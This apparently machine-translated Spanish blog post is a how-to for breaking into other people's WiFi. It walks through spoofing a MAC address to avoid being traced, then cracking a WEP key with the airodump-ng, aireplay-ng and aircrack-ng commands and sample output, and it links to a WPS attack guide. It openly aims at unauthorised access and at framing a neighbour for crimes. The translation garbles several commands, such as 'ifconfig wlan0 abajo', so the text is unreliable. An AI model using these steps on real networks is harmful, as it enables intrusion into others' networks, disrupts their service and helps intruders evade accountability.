Como hackear Wifi


Para comenzar deben tener el sistema backtrack de Linux en sus computadoras de otra forma esto no funcionara.
Este tutorial te enseñará a agrietarse y conectarse a cualquier wifi protegida con seguridad WEP o WPA con la función WPS habilitado. Esto hará que parezca que su vecino era el pajas de pornografía infantil, la compra de medicamentos, y el montaje del dos ataques contra los servidores del FBI. Yo también le enseñará cómo falsificar su dirección mac - esto evitará que alguien con acceso al router se conecta a partir de averiguar quién eres. Voy a estar asumiendo que todos ustedes se están ejecutando algunos distro linux.

################# ~ Suplantación de direcciones MAC ~ ###################
Este es un paso esencial para conectar a wifi del somone más. Si usted sigue estos pasos, no habrá pruebas de que usted era el que está conectado a la red.

Tipo:
sudo ifconfig wlan0 abajo
sudo macchanger -r wlan0
sudo ifconfig wlan0 hasta

Esto es lo que parece cuando lo hago:

    blargh @ Blargh-D: ~ $ sudo ifconfig wlan0 abajo
    [Sudo] password para blargh:
    blargh @ Blargh-D: ~ $ sudo macchanger -r wlan0
    Permanente MAC: 8c: a9: 82: 12: a0: c4 (Intel Corporate)
    Current MAC: 8c: a9: 82: 12: a0: c4 (Intel Corporate)
    Nuevo MAC: ca: fb: 86: d3: 68: c5 (desconocido)
    blargh @ Blargh-D: ~ $ sudo ifconfig wlan0 hasta


Si te da una mierda "wlan0: ERROR mientras que consigue banderas de interfaz: No existe el dispositivo"
hacer esto:

    sudo airmon-ng


para mí esto da:

Código: Seleccionar todo
    Interfaz conductor Chipset

    wlan0 Desconocido iwlwifi - [phy0]


simplemente sustituir su interfaz para wlan0 en los pasos anteriores si te da el no mencionado error tal dispositivo.

Puede que tenga que instalar algo. Para hacer este tipo:
sudo apt-get install <la mierda que usted necesita para instalar>

haciendo ifconfig wlan0 hacia abajo y luego traerlo de vuelta otra vez, probablemente le de lo que ya está conectado a desconectar, así que es posible que desee volver a conectar.

#################### ~ Breaking WEP wifi garantizado ~ ######################

Paso uno: leer mis cosas sobre la suplantación de su dirección mac - usted no desea conseguir a tope violada en la cárcel

Tipo:
sudo ifconfig wlan0 abajo
sudo airodump-ng wlan0

el segundo comando comenzará a imprimir un montón de información acerca de la diversión de todas las redes wifi en rango. Aquí es lo que parece para mí:

Código: Seleccionar todo
    CH 1] [transcurridos 32 s] [24.08.2013 01:02
                                                                                                               
     BSSID PWR Balizas #Data, # / s CH MB ENC CIPHER AUTH ESSID
                                                                                                               
     00: 18: 01: FF: 1C: C0 -70 114 5 0 6 54e. WEP WEP estos
     00: 1F: 33: E4: 5F: 48 -79 46 0 0 6 54e. Essids WPA2 PSK CCMP
     00: 26: B8: 99: F2: BF -81 45 2 0 11 54e. WEP WEP son
     74: 44: 01: 5A: 01: 25 -82 14 1 0 1 54e WPA2 PSK CCMP bullshit
     A0: 21: B7: 73: B6: 5F -83 25 7 3 1 54e WPA2 PSK y CCMP
     36: 46: 9A: 00: 1C: BC -86 11 0 0 3 54e. WPA2 PSK CCMP la
     00: 1F: 90: E0: F3: C8 -85 13 1 0 6 54e. BSSIDs WEP WEP
     30: 46: 9A: 00: 1C: BC -86 11 0 0 3 54e. WPA2 CCMP PSK son
     00: 13: 46: D2: 38: 06 -88 17 0 0 6 54. WPA TKIP PSK falsa
     00: 7F: 28: CA: 87: 99 -88 6 0 0 11 54e. WPA2 PSK CCMP FuckThePolice
                                                                                                               
     BSSID ESTACIÓN PWR Rate pierden paquetes Sondas
                                                                                                               
     00: 18: 01: FF: 1C: C0 F0: 6B: CA: 13: 1D: 07 -49 a 0 - 6 0 1
     A0: 21: B7: 73: B6: 5F 74: 44: 01: 5A: 01: 24 -81 0 - 1e 0 7
     (No asociado) 00: 1C: 10: E7: E5: 3B -83 0 - 1 0 2



Hit ctrl + c cuando vea una red WEP asegurado que desea atacar. Ahora tenemos que capturar un montón de información sobre esa red y lo ponemos en un archivo.
Tipo:

sudo airodump-ng-c <canal> w <nombre de archivo> --bssid <BSSID> wlan0

A continuación, se verá así:

Código: Seleccionar todo
     CH 3] [transcurrido: 1 s] [08/24/2013 1:47] [wlan0 canal fijo: -1
                                                                                   
     BSSID PWR RXQ Balizas #Data, # / s CH MB ENC CIPHER AUTH E
                                                                                   
     00: 18: 01: FF: 1C: C0 -77 10 6 0 0 6 54e. WEP WEP 3
                                                                                   
     BSSID ESTACIÓN PWR Rate pierden paquetes Sondas



Usted tendrá que esperar un tiempo para que este haga su trabajo. Mientras espera abrir una segunda terminal y hacer:
sudo aireplay-ng -1 0 -a <BSSID> -h 00: 11: 22: 33: 44: 55 -e <ESSID> wlan0

usted debe conseguir un mensaje reasuring "Asociación éxito" en unos pocos segundos.
Ahora hacer:

sudo aireplay-ng -3-b <BSSID> -h 00: 11: 22: 33: 44: 55 wlan0

Esto creará un montón de mierda métrica de tráfico en la red de destino y la velocidad de tu ataque. Se crea tanto tráfico que la red será un-utilizable mientras se está ejecutando. Después de unos minutos su terminal irá mierda de murciélago loco mostrando paquetes lectura y escritura. Tienes que esperar a que la columna de la #Data del primer símbolo del sistema para ir por encima de 10.000 o menos. Es posible que necesite más de 10k, pero 10000 ha sido lo suficientemente mayor parte del tiempo lo he hecho. Debe levantarse dar un paseo, escuchar música y tener relaciones sexuales mientras está esperando para que esto suceda. Se puede tomar un tiempo, dependiendo de la intensidad de la señal.

Ahora es el momento de correr la misma grieta. Tipo:

sudo aircrack-ng-b <BSSID> <nombre de archivo, 01.cap>

obviamente .cap es una extensión de archivo y nombre de archivo es el nombre del archivo que eligió anteriormente. Siempre se puede buscar en el directorio de casa y mirar el archivo.

Si todo funciona correctamente el comando aformetioned debe producir un resultado buscando algo como esto:

Código: Seleccionar todo
    Apertura fuckThePoliece-01.cap
    Ataque se reiniciará cada 5000 IVS capturados
    A partir ataque PTW con 72.370 IVS
                   Encontraban la clave! [B2: 69: 20: 1E: CC]
       Descifrado correctamente: 100%



Usted puede utilizar el material siguiente "encontraban la clave!" (Sin los corchetes obviamente) como la contraseña al conectarse a la wifi.

######################## ~ WPA con WPS habilitado ~ #################### ##
Las instrucciones WEP tomaron más tiempo para escribir de lo que yo pensé que iban y yo no tengo ganas de escribir más. Aquí hay un enlace a un tutorial que encontré con una búsqueda en Google:

http://lifehacker.com/5873407/how-a-grieta-a-wi+fi-redes-wpa-password-con-reaver

Está destinado a linux backtrack, pero podría fácilmente instalar los paquetes necesarios en cualquier distro. Puedo volver en un futuro y edito esto con un tutorial escrito personalmente para WPA, pero en este momento pereza es el rey.


Comentarios

Entradas más populares de este blog

There is/ there are Grammar Worksheet

tell to time workseet

can / can’t Worksheet